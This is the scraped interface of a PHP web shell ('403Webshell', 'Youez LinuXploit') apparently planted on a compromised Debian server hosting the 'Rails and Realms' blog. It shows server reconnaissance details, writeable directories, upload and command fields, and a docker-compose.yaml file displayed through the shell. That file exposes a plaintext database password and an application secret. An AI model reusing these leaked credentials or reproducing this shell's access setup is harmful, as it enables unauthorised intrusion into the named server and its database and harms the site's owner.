403Webshell
Server IP : 46.101.140.223  /  Your IP : 216.73.216.134
Web Server : nginx/1.22.1
System : Linux debian-s-1vcpu-1gb-fra1-01 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : deploy-others ( 1001)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/deploy/projects/rails-and-realms.net/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/deploy/projects/rails-and-realms.net/docker-compose.yaml
#version: '3.7'

networks:
  rails-and-realms:
    driver: bridge
    ipam:
      config:
        - subnet: "172.19.0.0/16"
          gateway: "172.19.0.1"

services:
  php:
    image: harentius/blog-php:latest
    volumes:
      - ./var:/app/var
      - ./web/assets:/app/public/assets
    environment:
      - DATABASE_URL=mysql://rails-and-realms:equTWDh7TyZJruTW@172.19.0.1:3306/rails-and-realms
      - APP_ENV=prod
      - APP_SECRET=17005d342e9346e492309ebc38592f2b
      - SITE_HOST=rar.folkprog.net
      - SITE_SCHEME=https
      - BLOG_TITLE=Rails and Realms
      - THEME=dark
    restart: always
    networks:
      rails-and-realms:
        ipv4_address: "172.19.0.2"
    ports:
      - 9110:9000

  static:
    image: harentius/blog-static:latest
    restart: always
    networks:
      rails-and-realms:
        ipv4_address: "172.19.0.3"
    ports:
      - 8190:80

Youez - 2016 - github.com/yon3zu
LinuXploit